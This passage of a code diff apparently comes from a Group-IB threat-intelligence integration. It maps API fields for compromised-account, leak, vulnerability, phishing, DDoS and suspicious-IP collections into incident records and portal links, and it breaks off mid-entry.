"hi/threat_actor": "createdAt", + "suspicious_ip/tor_node": "dateFirstSeen", + "suspicious_ip/open_proxy": "dateFirstSeen", + "suspicious_ip/socks_proxy": "dateFirstSeen", + "suspicious_ip/vpn": "dateFirstSeen", + "suspicious_ip/scanner": "dateFirstSeen", + "malware/cnc": "dateFirstSeen", + "malware/malware": "updatedAt", +} + +COLLECTIONS_THAT_MAY_NOT_SUPPORT_ID_SEARCH_VIA_UPDATED = [ + "suspicious_ip/tor_node", + "suspicious_ip/open_proxy", + "suspicious_ip/socks_proxy", + "osi/public_leak", +] + +SET_WITH_ALL_DATE_FIELDS = { + "dateEnd", + "createdAt", + "updated", + "dateCreated", + "dateFirstSeen", + "dateModified", + "dateLastCompromised", + "added", + "updatedAt", + "created", + "dateAdd", + "dateBegin", + "dateLastSeen", + "blocked", + "detected", + "dateIncident", + "dateFirstCompromised", + "dateDetected", + "datePublished", + "dateReg", + "date", + "validThruDate", + "datecompromised", + "dateDetected", +} + +TABLES_MAPPING = { + "compromised/account_group": ["events_table"], + "compromised/bank_card_group": ["threatActor", "compromised_events", "malware"], + "osi/git_repository": ["files"], + "osi/public_leak": ["linkList", "matches"], + "osi/vulnerability": ["cpeTable", "affectedSoftware"], + "attacks/phishing_kit": ["downloadedFrom"], + "malware/cnc": ["threatActor", "malwareList"], + "malware/malware": ["taList"], + "hi/threat": ["forumsAccounts"], + "hi/threat_actor": ["reports"], + "apt/threat_actor": ["reports"], + "apt/threat": ["forumsAccounts"], +} + +HTML_FIELDS = { + "apt/threat_actor": ["description"], + "apt/threat": ["description"], + "malware/malware": ["description", "shortDescription"], + "hi/threat": ["description"], + "hi/threat_actor": ["description"], + "osi/public_leak": ["data"], +} + +PORTAL_LINKS = { + "compromised/account_group": "https://tap.group-ib.com/cd/accounts?id=", + "compromised/breached": "https://tap.group-ib.com/cd/breached?id=", + "compromised/bank_card_group": "https://tap.group-ib.com/cd/cards?id=", + "compromised/mule": "https://tap.group-ib.com/cd/mules?id=", + "hi/threat": "https://tap.group-ib.com/ta/last-threats?threat=", + "hi/threat_actor": "https://tap.group-ib.com/ta/actors?ta=", + "apt/threat": "https://tap.group-ib.com/ta/last-threats?threat=", + "apt/threat_actor": "https://tap.group-ib.com/ta/actors?ta=", + "attacks/ddos": "https://tap.group-ib.com/attacks/ddos?id=", + "attacks/deface": "https://tap.group-ib.com/attacks/deface?q=id:", + "attacks/phishing_group": "https://tap.group-ib.com/attacks/phishing?scope=all&q=id:", + "attacks/phishing_kit": "https://tap.group-ib.com/malware/phishing-kit?p=1&q=", + "malware/malware": "https://tap.group-ib.com/malware/reports/", + "osi/git_repository": "https://tap.group-ib.com/cd/git-leaks?id=", + "osi/public_leak": "https://tap.group-ib.com/cd/leaks?id=", + "osi/vulnerability": "https://tap.group-ib.com/malware/vulnerabilities?p=1&scope=all&q=", + "suspicious_ip/tor_node": "https://tap.group-ib.com/suspicious/tor?q=", + "suspicious_ip/open_proxy": "https://tap.group-ib.com/suspicious/proxies?q=", + "suspicious_ip/socks_proxy": "https://tap.group-ib.com/suspicious/socks?q=", + "suspicious_ip/scanner": "https://tap.group-ib.com/suspicious/scanning?ip=", + "suspicious_ip/vpn": "https://tap.group-ib.com/suspicious/vpn?q=", +} + +COLLECTIONS_THAT_ARE_REQUIRED_HUNTING_RULES = ["osi/git_repository", "osi/public_leak", "compromised/breached"] + +COLLECTIONS_FOR_WHICH_THE_PORTAL_LINK_WILL_BE_GENERATED = ["compromised/breached"] + + +class NumberedSeverity(Enum): + LOW = 1 + MEDIUM = 2 + HIGH = 3 + + +class StringSeverity(Enum): + LOW = "Low" + MEDIUM = "Medium" + HIGH = "High" + + +MAPPING = { + "compromised/account_group": { # GIB Source:sourceType, severity:systemSeverity + "name": "login", + # Information from Group-IB + "id": "id", # GIB ID + "login": "login", # GIB Compromised Login + "password": "password", # GIB Password + "parsedLogin": { + "domain": "parsedLogin.domain", # GIB Parsed Login Domain + "ip": "parsedLogin.ip", # GIB Parsed Login IP + }, + "service": { + "domain": "service.domain", # GIB Service Domain + "ip": "service.ip", # GIB Service IP + "url": "service.url", # GIB Service URL + }, + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("compromised/account_group"), + "dynamic": "id", + } + }, + "events_table": { # GIB Compromised Events Information Table + "cnc": "events.cnc.cnc", + "asn": "events.client.ipv4.asn", + "city": "events.client.ipv4.city", + "region": "events.client.ipv4.region", + "provider": "events.client.ipv4.provider", + "countryCode": "events.client.ipv4.countryCode", + "ip": "events.client.ipv4.ip", + "malware": "events.malware.name", + "threatActor": "events.threatActor.name", + "dateDetected": "events.dateDetected", + "dateCompromised": "events.dateCompromised", + "phone": "events.person.phone", + "name": "events.person.name", + "email": "events.person.email", + "address": "events.person.address", + }, + # END Information from Group-IB + # Group-IB Dates + "dateFirstCompromised": "dateFirstCompromised", # GIB Date First Compromised + "dateLastCompromised": "dateLastCompromised", # GIB Date Last Compromised + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + # END Group-IB Dates + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "event_url": "events.cnc.url", + "event_domain": "events.cnc.domain", + "events_ipv4_ip": "events.cnc.ipv4.ip", + "asn": "events.client.ipv4.asn", + "country_name": "events.client.ipv4.countryName", + "region": "events.client.ipv4.region", + }, }, - "compromised/imei": { - "name": - "device.imei", - "prefix": - "Compromised IMEI", - "indicators": - [ - { - "main_field": "cnc.url", "main_field_type": "URL", - }, - { - "main_field": "cnc.domain", "main_field_type": "Domain", - }, - { - "main_field": "cnc.ipv4.ip", "main_field_type": "IP", - "add_fields": ["cnc.ipv4.asn", "cnc.ipv4.countryName", "cnc.ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] + "compromised/bank_card_group": { # GIB Source:sourceType, severity:systemSeverity + "name": "cardInfo.number", + # Card Info From Group-IB + "issuer": "cardInfo.issuer.issuer", # GIB Card Issuer + "number": "cardInfo.number", # GIB Card Number + "type": "cardInfo.type", # GIB Card Type + "payment_system": "cardInfo.system", # GIB Payment System + # End Card Info From Group-IB + # Information from Group-IB + "id": "id", # GIB ID + "compromised_events": { # GIB Compromised Events Table + "valid_thru_date": "events.cardInfo.validThruDate", + "valid_thru": "events.cardInfo.validThru", + "client_ip": "events.client.ipv4.ip", + "cnc": "events.cnc.cnc", + "cnc_ip": "events.cnc.ipv4.ip", + "threat_actor_name": "events.threatActor.name", + "date_compromised": "events.dateCompromised", + "victim_phone": "events.owner.phone", + "victim_name": "events.owner.name", + "malware": "events.malware.name", + }, + "malware": { # GIB Malware Table + "id": "malware.id", + "name": "malware.name", + }, + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("compromised/bank_card_group"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + # Group-IB Dates + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "dateFirstCompromised": "dateFirstCompromised", # GIB Date First Compromised + "dateLastCompromised": "dateLastCompromised", # GIB Date Last Compromised + # END Group-IB Dates + # Threat Actor + "threatActor": { # GIB Threat Actors Table + "id": "threatActor.id", + "name": "threatActor.name", + }, + # End Threat Actor + "indicators": { # GIB Related Indicators Data + "cnc_url": "events.cnc.url", + "cnc_domain": "events.cnc.domain", + "cnc_ipv4_ip": "events.cnc.ipv4.ip", + "cnc_ipv4_asn": "events.cnc.ipv4.asn", + "cnc_ipv4_country_name": "events.cnc.ipv4.countryName", + "cnc_ipv4_region": "events.cnc.ipv4.region", + }, }, - "attacks/ddos": { - "name": - "target.ipv4.ip", - "prefix": - "Attacks DDoS", - "indicators": - [ - { - "main_field": "cnc.url", "main_field_type": "URL", - }, - { - "main_field": "cnc.domain", "main_field_type": "Domain", - }, - { - "main_field": "cnc.ipv4.ip", "main_field_type": "IP", - "add_fields": ["cnc.ipv4.asn", "cnc.ipv4.countryName", "cnc.ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - }, - ] + "compromised/breached": { # GIB Source:sourceType, severity:systemSeverity + "name": "id", + # Information from Group-IB + "id": "id", # GIB ID + "leakName": "leakName", # GIB Leak Name + "passwords": "password", # GIB Passwords + "description": "description", # Description + "emails": "email", # GIB Emails + "emailDomains": "addInfo.emailDomain", # GIB Email Domains + "portalLink": "set_generated_portal_link", # GIB Portal Link + # END Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + # Group-IB Dates + "leakPublished": "leakPublished", # GIB Leak Published + "updateTime": "updateTime", # GIB Update Time + "uploadTime": "uploadTime", # GIB Upload Time + # END Group-IB Dates }, - "attacks/deface": { - "name": - "url", - "prefix": - "Attacks Deface", - "indicators": - [ - { - "main_field": "url", "main_field_type": "URL", - }, - { - "main_field": "targetDomain", "main_field_type": "Domain", - }, - { - "main_field": "targetIp.ip", "main_field_type": "IP", - "add_fields": ["targetIp.asn", "targetIp.countryName", "targetIp.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] + "compromised/mule": { # GIB Source:sourceType, severity:systemSeverity + "name": "account", + # Information from Group-IB + "id": "id", # GIB ID + "hash": "hash", # GIB Data Hash + "dateAdd": "dateAdd", # GIB Date Add + "dateIncident": "dateIncident", # GIB Date Incident + "organization": { + "bic": "organization.bic", # GIB Organization BIC + "bsb": "organization.bsb", # GIB Organization BSB + "iban": "organization.iban", # GIB Organization IBAN + "name": "organization.name", # GIB Organization Name + "swift": "organization.swift", # GIB Organization SWIFT + "clabe": "organization.clabe", # GIB Organization CLABE + }, + "account": "account", # GIB Compromised Account + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("compromised/mule"), + "dynamic": "id", + } + }, + # END Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "cnc_url": "cnc.url", + "cnc_domain": "cnc.domain", + "cnc_ipv4_ip": "cnc.ipv4.ip", + "cnc_ipv4_asn": "cnc.ipv4.asn", + "cnc_ipv4_country_name": "cnc.ipv4.countryName", + "cnc_ipv4_region": "cnc.ipv4.region", + }, }, - "attacks/phishing": { - "name": - "phishingDomain.domain", - "prefix": - "Phishing", - "indicators": - [ - { - "main_field": "url", "main_field_type": "URL", - }, - { - "main_field": "phishingDomain.domain", "main_field_type": "Domain", - "add_fields": ["phishingDomain.registrar"], - "add_fields_types": ["registrarname"] - }, - { - "main_field": "ipv4.ip", "main_field_type": "IP", - "add_fields": ["ipv4.asn", "ipv4.countryName", "ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] + "osi/git_repository": { # GIB Source:sourceType, severity:systemSeverity + # Information from Group-IB + "id": "id", # GIB ID + "name": "name", + "leaked_file_name": "name", # GIB Leaked File Name + "source": "source", # GIB GIT Source + "dateDetected": "dateDetected", # GIB Date of Detection + "dateCreated": "dateCreated", # GIB Date Created + "files": { # GIB OSI Git Repository Files Table + "file_id": "files.id", + "file_name": "files.name", + "hash": "files.revisions.hash", + "dateCreated": "files.dateCreated", + "dateDetected": "files.dateDetected", + "authorName": "files.revisions.info.authorName", + "authorEmail": "files.revisions.info.authorEmail", + "url": "files.url", + "dataFound": "files.dataFound", + }, + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("osi/git_repository"), + "dynamic": "id", + } + }, + # END Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "hash": "files.revisions.hash", + "contributors_emails": "contributors.authorEmail", + }, }, - "attacks/phishing_kit": { - "name": - "emails", - "prefix": - "Phishing Kit", - "indicators": - [ - { - "main_field": "emails", "main_field_type": "Email", - } - ] + "osi/public_leak": { # GIB Source:sourceType, severity:systemSeverity + "name": "hash", + # Information from Group-IB + "id": "id", # GIB ID + "hash": "hash", # GIB Data Hash + "created": "created", # GIB Date Created + "data": "data", # GIB Leaked Data + "linkList": { # GIB Link List Table + "author": "linkList.author", + "hash": "linkList.hash", + "link": "linkList.link", + "title": "linkList.title", + "source": "linkList.source", + "dateDetected": "linkList.dateDetected", + "datePublished": "linkList.datePublished", + }, + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("osi/public_leak"), + "dynamic": "id", + } + }, + "matches": "matches", # GIB Matches Table + # END Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation }, - "apt/threat": { - "prefix": - "Threat", - "indicators": - [ - { - "main_field": "indicators.params.ipv4", "main_field_type": "IP", - }, - { - "main_field": "indicators.params.domain", "main_field_type": "Domain", - }, - { - "main_field": "indicators.params.url", "main_field_type": "URL", - }, - { - "main_field": "indicators.params.hashes.md5", "main_field_type": "File", - "add_fields": - [ - "indicators.params.name", "indicators.params.hashes.md5", - "indicators.params.hashes.sha1", - "indicators.params.hashes.sha256", "indicators.params.size" - ], - "add_fields_types": ["gibfilename", "md5", "sha1", "sha256", "size"] - } - ] + "osi/vulnerability": { # GIB Source:sourceType, severity:systemSeverity + "name": "id", + # Group-IB Dates + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "dateModified": "dateModified", # GIB Date Modified + "datePublished": "datePublished", # GIB Date Published + # END Group-IB Dates + # Information from Group-IB + "id": "id", # GIB ID + "bulletinFamily": "bulletinFamily", # GIB Bulletin Family + "description": "description", # Description + "extDescription": "extDescription", # GIB Extended Description + "reporter": "reporter", # GIB Reporter + "hasExploit": "hasExploit", # GIB Has Exploit + "href": "href", # GIB Href + "mergedCvss": "mergedCvss", # GIB Merged Cvss + "type": "type", # GIB Vulnerability Type + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("osi/vulnerability"), + "dynamic": "id", + } + }, + "cpeTable": { # GIB CPE Table + "product": "cpeTable.product", + "string": "cpeTable.string", + "string23": "cpeTable.string23", + "type": "cpeTable.type", + "vendor": "cpeTable.vendor", + "version": "cpeTable.version", + }, + # END Information from Group-IB + # Group-IB Affected Software + "affectedSoftware": { # GIB Affected Software Table + "name": "affectedSoftware.name", + "operator": "affectedSoftware.operator", + "version": "affectedSoftware.version", + }, + # END Group-IB Affected Software + # Group-IB CVSS Information + "cvss": { + "score": "cvss.score", # GIB CVSS Score + "vector": "cvss.vector", # GIB CVSS Vector + }, + "extCvss": { + "base": "extCvss.base", # GIB Extended CVSS Base + "exploitability": "extCvss.exploitability", # GIB Extended CVSS Exploitability + "impact": "extCvss.impact", # GIB Extended CVSS Impact + "overall": "extCvss.overall", # GIB Extended CVSS Overall + "temporal": "extCvss.temporal", # GIB Extended CVSS Temporal + }, + # END Group-IB CVSS Information + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "severity": "evaluation.severity", + "id": "id", + "cvss_score": "cvss.score", + "description": "description", + "dateLastSeen": "dateLastSeen", + "datePublished": "datePublished", + "software_mixed": { + "names": "softwareMixed.softwareName", + "types": "softwareMixed.softwareType", + "versions": "softwareMixed.softwareVersion", + }, + }, }, - "hi/threat": { - "prefix": - "Threat", - "indicators": - [ - { - "main_field": "indicators.params.ipv4", "main_field_type": "IP", - }, - { - "main_field": "indicators.params.domain", "main_field_type": "Domain", - }, - { - "main_field": "indicators.params.url", "main_field_type": "URL", - }, - { - "main_field": "indicators.params.hashes.md5", "main_field_type": "File", - "add_fields": - [ - "indicators.params.name", "indicators.params.hashes.md5", - "indicators.params.hashes.sha1", - "indicators.params.hashes.sha256", "indicators.params.size" - ], - "add_fields_types": ["gibfilename", "md5", "sha1", "sha256", "size"] - } - ] + "attacks/ddos": { # GIB Source:sourceType, severity:systemSeverity + "name": "target.ipv4.ip", + # Information from Group-IB + "id": "id", # GIB ID + "dateBegin": "dateBegin", # GIB DDOS Date Begin + "dateEnd": "dateEnd", # GIB DDOS Date End + "dateReg": "dateReg", # GIB DDOS Date Registration + "duration": "duration", # GIB DDOS Duration + "protocol": "protocol", # GIB DDOS Protocol + "source": "source", # GIB DDOS Source + "type": "type", # GIB DDOS Type + "malwareName": "malware.name", # GIB Malware Name + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("attacks/ddos"), + "dynamic": "id", + } + }, + # END Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + # CNC Information from Group-IB + "cnc": { + "cnc": "cnc.cnc", # GIB CNC + "domain": "cnc.domain", # GIB CNC Domain + "port": "cnc.port", # GIB CNC Port + "url": "cnc.url", # GIB CNC URL + }, + # END CNC Information from Group-IB + # Group-IB Threat Actor + "threatActor": { + "id": "threatActor.id", # GIB Threat Actor ID + "name": "threatActor.name", # GIB Threat Actor Name + "isAPT": "threatActor.isAPT", # GIB Threat Actor is APT + }, + # End Group-IB Threat Actor + # Group-IB DDOS Target + "target": { + "url": "target.url", # GIB DDOS Target URL + "asn": "target.ipv4.asn", # GIB DDOS Target ASN + "city": "target.ipv4.city", # GIB DDOS Target City + "region": "target.ipv4.region", # GIB DDOS Target Region + "provider": "target.ipv4.provider", # GIB DDOS Target Provider + "countryCode": "target.ipv4.countryCode", # GIB DDOS Target Country Code + "countryName": "target.ipv4.countryName", # GIB DDOS Target Country Name + "ip": "target.ipv4.ip", # GIB DDOS Target IP + "port": "target.port", # GIB DDOS Target Port + "category": "target.category", # GIB DDOS Target Category + "domain": "target.domain", # GIB DDOS Target Domain + }, + # END Group-IB DDOS Target + # Group-IB DDOS Request + "requestData": { + "link": "requestData.link", # GIB DDOS Request Data Link + "headersHash": "requestData.headersHash", # GIB DDOS Request Headers Hash + "body": "requestData.body", # GIB DDOS Request Body + "bodyHash": "requestData.bodyHash", # GIB DDOS Request Body Hash + }, + # END Group-IB DDOS Request + "indicators": { # GIB Related Indicators Data + "target_ipv4_ip": "target.ipv4.ip", + "cnc_url": "cnc.url", + "cnc_domain": "cnc.domain", + "cnc_ipv4_ip": "cnc.ipv4.ip", + "cnc_ipv4_asn": "cnc.ipv4.asn", + "cnc_ipv4_country_name": "cnc.ipv4.countryName", + "cnc_ipv4_region": "cnc.ipv4.region", + }, }, - "suspicious_ip/tor_node": { - "name": - "ipv4.ip", - "prefix": - "Suspicious IP Tor Node", - "indicators": - [ - { - "main_field": "ipv4.ip", "main_field_type": "IP", - "add_fields": ["ipv4.asn", "ipv4.countryName", "ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] + "attacks/deface": { # GIB Source:sourceType, severity:systemSeverity + "name": "url", + # Information from Group-IB + "id": "id", # GIB ID + "mirrorLink": "mirrorLink", # GIB Mirror Link + "providerDomain": "providerDomain", # GIB Provider Domain + "siteUrl": "siteUrl", # GIB Deface Site URL + "source": "source", # GIB Deface Source + "targetDomain": "targetDomain", # GIB Target Domain + "targetDomainProvider": "targetDomainProvider", # GIB Target Domain Provider + "date": "date", # GIB Deface Date + "contacts": "contacts", # GIB Deface Contacts + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("attacks/deface"), + "dynamic": "id", + } + }, + # END Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + # Group-IB Target IP + "targetIp": { + "asn": "targetIp.asn", # GIB Target ASN + "city": "targetIp.city", # GIB Target City + "countryCode": "targetIp.countryCode", # GIB Country Code + "countryName": "targetIp.countryName", # GIB Country Name + "ip": "targetIp.ip", # GIB Target IP + "provider": "targetIp.provider", # GIB Target Provider + "region": "targetIp.region", # GIB Target Region + }, + # END Group-IB Target IP + # Group-IB Threat Actor + "threatActor": { + "id": "threatActor.id", # GIB Threat Actor ID + "name": "threatActor.name", # GIB Threat Actor Name + "isAPT": "threatActor.isAPT", # GIB Threat Actor is APT + }, + # End Group-IB Threat Actor + "indicators": { # GIB Related Indicators Data + "url": "url", + "target_domain": "targetDomain", + "target_ip_ip": "targetIp.ip", + "target_ip_asn": "targetIp.asn", + "target_ip_country_name": "targetIp.countryName", + "target_ip_region": "targetIp.region", + }, }, - "suspicious_ip/open_proxy": { - "name": - "ipv4.ip", - "prefix": - "Suspicious IP Open Proxy", - "indicators": - [ - { - "main_field": "ipv4.ip", "main_field_type": "IP", - "add_fields": ["ipv4.asn", "ipv4.countryName", "ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] + "attacks/phishing_group": { # GIB Source:sourceType, severity:systemSeverity + "name": "brand", + # Information from Group-IB + "id": "id", # GIB ID + "brand": "brand", # GIB Phishing Brand + "phishing_urls": "phishing.url", # GIB Phishing URLs + "objective": "objective", # GIB Phishing Objectives + "source": "source", # GIB Phishing Sources + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("attacks/phishing_group"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Dates + "blocked": "date.blocked", # GIB Phishing Date Blocked + "added": "date.added", # GIB Phishing Date Added + "detected": "date.detected", # GIB Phishing Date Detected + "updated": "date.updated", # GIB Phishing Date Updated + # END Group-IB Dates + # Group-IB Domain Information + "domainInfo": { + "domain": "domainInfo.domain", # GIB Phishing Domain + "domainPuny": "domainInfo.domainPuny", # GIB Phishing Domain Puny + "expirationDate": "domainInfo.expirationDate", # GIB Phishing Domain Expiration Date + "registrar": "domainInfo.registrar", # GIB Phishing Registrar + }, + # END Group-IB Domain Information + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + # Group-IB Phishing Information + "phishing_ip": { # GIB Phishing IP Table + "ip": "ip.ip", + "countryCode": "ip.countryCode", + "countryName": "ip.countryName", + "provider": "ip.provider", + }, + # End Phishing Information from Group-IB + # Group-IB Threat Actor Information + "threatActor": { + "id": "threatActor.id", # GIB Threat Actor ID + "name": "threatActor.name", # GIB Threat Actor Name + }, + # End Group-IB Threat Actor Information + # Group-IB Phishing Kit Table + "phishing_kit_table": { # GIB Phishing Kit Table + "name": "phishing.phishingKit.name", + "email": "phishing.phishingKit.email", + }, + # END Group-IB Phishing Kit Table + "indicators": { # GIB Related Indicators Data + "url": "phishing.url", + "phishing_domain_domain": "domain", + "phishing_domain_registrar": "domainInfo.registrar", + "ipv4_ip": "phishing.ip.ip", + "ipv4_country_name": "phishing.ip.countryName", + }, }, - "suspicious_ip/socks_proxy": { - "name": - "ipv4.ip", - "prefix": - "Suspicious IP Socks Proxy", - "indicators": - [ - { - "main_field": "ipv4.ip", "main_field_type": "IP", - "add_fields": ["ipv4.asn", "ipv4.countryName", "ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] + "attacks/phishing_kit": { # GIB Source:sourceType, severity:systemSeverity + "name": "hash", + # Information from Group-IB + "id": "id", # GIB ID + "hash": "hash", # GIB Data Hash + "dateDetected": "dateDetected", # GIB Date of Detection + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "source": "source", # GIB Phishing Kit Source + "emails": "emails", # GIB Phishing Kit Email + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("attacks/phishing_kit"), + "dynamic": "id", + } + }, + "downloadedFrom": { # GIB Downloaded From Table + "date": "downloadedFrom.date", + "url": "downloadedFrom.url", + "phishingUrl": "downloadedFrom.phishingUrl", + "domain": "downloadedFrom.domain", + "fileName": "downloadedFrom.fileName", + }, + # End Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": {"emails": "emails"}, # GIB Related Indicators Data }, - "malware/cnc": { - "name": - "ipv4.ip", - "prefix": - "Malware CNC", - "indicators": - [ - { - "main_field": "url", "main_field_type": "URL" - }, - { - "main_field": "domain", "main_field_type": "Domain" - }, - { - "main_field": "ipv4.ip", "main_field_type": "IP", - "add_fields": ["ipv4.asn", "ipv4.countryName", "ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] + "suspicious_ip/tor_node": { # GIB Source:sourceType, severity:systemSeverity + "name": "ipv4.ip", + # Information from Group-IB + "id": "id", # GIB ID + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("suspicious_ip/tor_node"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_name": "ipv4.countryName", + "ipv4_region": "ipv4.region", + }, }, - "osi/vulnerability": { - "name": - "id", - "prefix": - "OSI Vulnerability", - "indicators": - [ - { - "main_field": "id", "main_field_type": "CVE", - "add_fields": ["cvss.score", "description", "dateLastSeen", "datePublished"], - "add_fields_types": ["cvss", "cvedescription", "cvemodified", "published"] - } - ] + "suspicious_ip/open_proxy": { # GIB Source:sourceType, severity:systemSeverity + "name": "ipv4.ip", + # Information from Group-IB + "id": "id", # GIB ID + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "dateDetected": "dateDetected", # GIB Date of Detection + "port": "port", # GIB Proxy Port + "source": "source", # GIB Proxy Source + "sources": "sources", # GIB Proxy Sources + "type": "type", # GIB Proxy Type + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("suspicious_ip/open_proxy"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_name": "ipv4.countryName", + "ipv4_region": "ipv4.region", + }, + }, + "suspicious_ip/socks_proxy": { # GIB Source:sourceType, severity:systemSeverity + "name": "ipv4.ip", + # Information from Group-IB + "id": "id", # GIB ID + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "dateDetected": "dateDetected", # GIB Date of Detection + "source": "source", # GIB Socks Proxy Source + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("suspicious_ip/socks_proxy"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_name": "ipv4.countryName", + "ipv4_region": "ipv4.region", + }, + }, + "suspicious_ip/vpn": { # GIB Source:sourceType, severity:systemSeverity + "name": 